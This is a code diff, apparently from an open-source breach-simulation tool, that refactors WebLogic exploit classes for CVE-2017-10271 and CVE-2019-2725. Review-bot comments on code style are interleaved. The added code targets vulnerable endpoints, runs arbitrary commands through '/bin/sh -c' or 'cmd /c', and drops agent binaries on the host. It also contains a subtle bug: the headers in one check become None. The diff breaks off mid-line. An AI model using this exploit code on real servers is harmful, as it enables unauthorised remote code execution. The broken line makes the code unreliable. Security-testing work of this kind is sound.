diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py
index 4c99f82b9..300f52f0e 100644
--- a/monkey/infection_monkey/exploit/weblogic.py
+++ b/monkey/infection_monkey/exploit/weblogic.py
@@ -1,3 +1,48 @@
+from __future__ import print_function
+import threading
+import logging
+import time
+import copy
+
+from requests import post, exceptions
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+
+from infection_monkey.exploit.web_rce import WebRCE
+from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
+
+
+__author__ = "VakarisZ"
+
+LOG = logging.getLogger(__name__)
+# How long server waits for get request in seconds
+SERVER_TIMEOUT = 4
+# How long should we wait after each request in seconds
+REQUEST_DELAY = 0.1
+# How long to wait for a sign(request from host) that server is vulnerable. In seconds
+REQUEST_TIMEOUT = 5
+# How long to wait for response in exploitation. In seconds
+EXECUTION_TIMEOUT = 15
+# Malicious requests' headers:
+HEADERS = {
+ "Content-Type": "text/xml;charset=UTF-8",
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
+ "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
+}
+
+
+class WebLogicExploiter(HostExploiter):
+
+ _TARGET_OS_TYPE = ['linux', 'windows']
+ _EXPLOITED_SERVICE = 'Weblogic'
+
+ def exploit_host(self):
+ exploiters = [WebLogic20192725, WebLogic201710271]
+ for exploiter in exploiters:
+ if exploiter(self.host).exploit_host():
+ return True
+
+
# Exploit based of:
# Kevin Kirsche (d3c3pt10n)
# https://github.com/kkirsche/CVE-2017-10271
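Review bot: `WebLogicExploiter.exploit_host` returns `True` when a sub-exploiter succeeds but falls off the end of the `for` loop otherwise, so a target that is not exploitable yields `None` instead of `False`; add `return False` after the loop so callers comparing against a boolean get a consistent result. The two sub-exploiters are tried in sequence with no handling between them, so if the first one raises, the second is never attempted — presumably acceptable, but worth a one-line comment stating that order and fall-through are intentional. A short class docstring on `WebLogicExploiter` saying it is a dispatcher over the CVE-specific classes below would also help, since the class itself carries no exploit logic.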
@@ -5,57 +50,29 @@
# Luffin from Github
# https://github.com/Luffin/CVE-2017-10271
# CVE: CVE-2017-10271
-from __future__ import print_function
-from requests import post, exceptions
-from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
-from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+class WebLogic201710271(WebRCE):
+ URLS = ["/wls-wsat/CoordinatorPortType",
+ "/wls-wsat/CoordinatorPortType11",
+ "/wls-wsat/ParticipantPortType",
+ "/wls-wsat/ParticipantPortType11",
+ "/wls-wsat/RegistrationPortTypeRPC",
+ "/wls-wsat/RegistrationPortTypeRPC11",
+ "/wls-wsat/RegistrationRequesterPortType",
+ "/wls-wsat/RegistrationRequesterPortType11"]
-import threading
-import logging
-import time
-
-__author__ = "VakarisZ"
-
-LOG = logging.getLogger(__name__)
-# How long server waits for get request in seconds
-SERVER_TIMEOUT = 4
-# How long should be wait after each request in seconds
-REQUEST_DELAY = 0.0001
-# How long to wait for a sign(request from host) that server is vulnerable. In seconds
-REQUEST_TIMEOUT = 5
-# How long to wait for response in exploitation. In seconds
-EXECUTION_TIMEOUT = 15
-URLS = ["/wls-wsat/CoordinatorPortType",
- "/wls-wsat/CoordinatorPortType11",
- "/wls-wsat/ParticipantPortType",
- "/wls-wsat/ParticipantPortType11",
- "/wls-wsat/RegistrationPortTypeRPC",
- "/wls-wsat/RegistrationPortTypeRPC11",
- "/wls-wsat/RegistrationRequesterPortType",
- "/wls-wsat/RegistrationRequesterPortType11"]
-# Malicious request's headers:
-HEADERS = {
- "Content-Type": "text/xml;charset=UTF-8",
- "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
- "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
- }
-
-
-class WebLogicExploiter(WebRCE):
- _TARGET_OS_TYPE = ['linux', 'windows']
- _EXPLOITED_SERVICE = 'Weblogic'
+ _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
+ _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
def __init__(self, host):
- super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
+ super(WebLogic201710271, self).__init__(host, {'linux': '/tmp/monkey.sh',
'win32': 'monkey32.exe',
'win64': 'monkey64.exe'})
def get_exploit_config(self):
- exploit_config = super(WebLogicExploiter, self).get_exploit_config()
+ exploit_config = super(WebLogic201710271, self).get_exploit_config()
exploit_config['blind_exploit'] = True
exploit_config['stop_checking_urls'] = True
- exploit_config['url_extensions'] = URLS
+ exploit_config['url_extensions'] = WebLogic201710271.URLS
return exploit_config
def exploit(self, url, command):
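Review bot: `get_exploit_config` reads the URL list as `WebLogic201710271.URLS` (a hard-coded class reference) rather than `self.URLS`, so a subclass overriding `URLS` would be ignored; `exploit_config['url_extensions'] = self.URLS` keeps the override path open with no behaviour change here. `_TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE` binds the same list object in both classes, so any in-place mutation of one would show up in the other — likely harmless if it is never mutated, but a tuple or a short comment would make that explicit. The `exploit` method that begins on the last line of this hunk has its body outside the hunk.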
@@ -66,8 +83,8 @@ class WebLogicExploiter(WebRCE):
try:
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
except Exception as e:
- print('[!] Connection Error')
- print(e)
+ LOG.error("Connection error: %s" % e)
+ return False
return True
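Review bot: The new `except Exception as e` branch reports every failure, including programming errors, as a connection error; since the module header imports `exceptions` from `requests`, narrowing it to `except exceptions.RequestException as e:` makes the log message truthful and lets other exceptions surface. The message should also use the logger's lazy formatting, `LOG.error("Connection error: %s", e)`, instead of pre-formatting with `%`. The enclosing `exploit` method starts outside this hunk.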
@@ -196,6 +213,7 @@ class WebLogicExploiter(WebRCE):
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
we determine if we can exploit by either getting a GET request from host or not.
"""
+
def __init__(self, local_ip, local_port, lock, max_requests=1):
self.local_ip = local_ip
self.local_port = local_port
@@ -212,6 +230,7 @@ class WebLogicExploiter(WebRCE):
def do_GET():
LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1
+
LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self.local_ip, self.local_port), S)
httpd.daemon = True
@@ -224,3 +243,82 @@ class WebLogicExploiter(WebRCE):
def stop(self):
self._stopped = True
+
+
+# Exploit based of:
+# Andres Rodriguez (acamro)
+# https://github.com/rapid7/metasploit-framework/pull/11780
+class WebLogic20192725(WebRCE):
+ URLS = ["_async/AsyncResponseServiceHttps"]
+
+ _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
+ _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
+
+ def __init__(self, host):
+ super(WebLogic20192725, self).__init__(host)
+
+ def get_exploit_config(self):
+ exploit_config = super(WebLogic20192725, self).get_exploit_config()
+ exploit_config['url_extensions'] = WebLogic20192725.URLS
+ exploit_config['blind_exploit'] = True
+ exploit_config['dropper'] = True
+ return exploit_config
+
+ def exploit(self, url, command):
+ if 'linux' in self.host.os['type']:
+ payload = self.get_exploit_payload('/bin/sh', '-c', command)
+ else:
+ payload = self.get_exploit_payload('cmd', '/c', command)
+ try:
+ resp = post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT)
+ return resp
+ except Exception as e:
+ LOG.error("Connection error: %s" % e)
+ return False
+
+ def check_if_exploitable(self, url):
+ headers = copy.deepcopy(HEADERS).update({'SOAPAction': ''})
+ res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
+ if res.status_code == 500 and "